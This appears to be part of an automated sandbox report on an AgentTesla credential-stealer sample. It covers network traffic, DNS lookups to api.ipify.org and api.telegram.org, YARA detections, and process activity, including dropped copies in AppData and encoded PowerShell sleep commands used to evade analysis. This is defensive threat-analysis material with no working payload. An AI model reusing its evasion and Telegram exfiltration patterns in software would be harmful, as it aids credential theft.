                                        Mar 20, 2023 18:32:36.307337046 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:36.514731884 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:36.514903069 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:36.752813101 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:36.752886057 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:37.603478909 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:37.603661060 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:37.603812933 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:37.608839989 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.255290031 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.255369902 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:23.255475044 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.258941889 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.259001017 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:23.901695013 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:23.901845932 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.904732943 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.904772043 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:23.905273914 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:23.941174984 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:23.941207886 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:24.256023884 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:24.256136894 CET44349714173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:33:24.256246090 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:24.257375956 CET49714443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:33:24.753156900 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.753216028 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.753302097 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.753787041 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.753807068 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.817501068 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.817751884 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.820658922 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.820687056 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.821106911 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.823626995 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.823657036 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.869210958 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.869610071 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.869642973 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.982460022 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.982655048 CET44349715149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:33:24.982764006 CET49715443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:33:24.983042955 CET49715443192.168.2.3149.154.167.220

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 20, 2023 18:31:27.614362001 CET5892153192.168.2.38.8.8.8
                                        Mar 20, 2023 18:31:27.633577108 CET53589218.8.8.8192.168.2.3
                                        Mar 20, 2023 18:31:27.642391920 CET6270453192.168.2.38.8.8.8
                                        Mar 20, 2023 18:31:27.665841103 CET53627048.8.8.8192.168.2.3
                                        Mar 20, 2023 18:31:36.269547939 CET5784053192.168.2.38.8.8.8
                                        Mar 20, 2023 18:31:36.289082050 CET53578408.8.8.8192.168.2.3
                                        Mar 20, 2023 18:32:35.568073988 CET5799053192.168.2.38.8.8.8
                                        Mar 20, 2023 18:32:35.586179972 CET53579908.8.8.8192.168.2.3
                                        Mar 20, 2023 18:32:35.607027054 CET5238753192.168.2.38.8.8.8
                                        Mar 20, 2023 18:32:35.627496004 CET53523878.8.8.8192.168.2.3
                                        Mar 20, 2023 18:33:23.202795029 CET4930253192.168.2.38.8.8.8
                                        Mar 20, 2023 18:33:23.222448111 CET53493028.8.8.8192.168.2.3
                                        Mar 20, 2023 18:33:23.229949951 CET5397553192.168.2.38.8.8.8
                                        Mar 20, 2023 18:33:23.249663115 CET53539758.8.8.8192.168.2.3
                                        Mar 20, 2023 18:33:24.733335972 CET5113953192.168.2.38.8.8.8
                                        Mar 20, 2023 18:33:24.752517939 CET53511398.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 20, 2023 18:31:27.614362001 CET192.168.2.38.8.8.80x19fcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.642391920 CET192.168.2.38.8.8.80xa091Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:36.269547939 CET192.168.2.38.8.8.80x71bcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.568073988 CET192.168.2.38.8.8.80x38bcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.607027054 CET192.168.2.38.8.8.80xc297Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.202795029 CET192.168.2.38.8.8.80x7ad3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.229949951 CET192.168.2.38.8.8.80xf168Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:24.733335972 CET192.168.2.38.8.8.80x2cfeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:31:36.289082050 CET8.8.8.8192.168.2.30x71bcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:33:24.752517939 CET8.8.8.8192.168.2.30x2cfeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • api.ipify.org
                                        • api.telegram.org

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:30:47
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x3d0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:18:30:57
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:18:30:57
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:12
                                        Start time:18:31:25
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x50000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:13
                                        Start time:18:31:25
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0xb0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:14
                                        Start time:18:31:26
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x3d0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:15
                                        Start time:18:31:26
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0xd60000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Target ID:16
                                        Start time:18:31:33
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        Imagebase:0xcf0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 53%, Virustotal, Browse
                                        • Detection: 33%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:17
                                        Start time:18:31:42
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                        Imagebase:0x7ff745070000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 33%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:18
                                        Start time:18:31:53
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        Imagebase:0xe00000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:19
                                        Start time:18:31:55
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Target ID:20
                                        Start time:18:31:55
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:21
                                        Start time:18:32:02
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                        Imagebase:0x9f0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:24
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:25
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Imagebase:0x130000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:26
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:27
                                        Start time:18:32:30
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Imagebase:0x950000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        General

                                        Target ID:28
                                        Start time:18:32:50
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:29
                                        Start time:18:32:50
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff68f300000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        No disassembly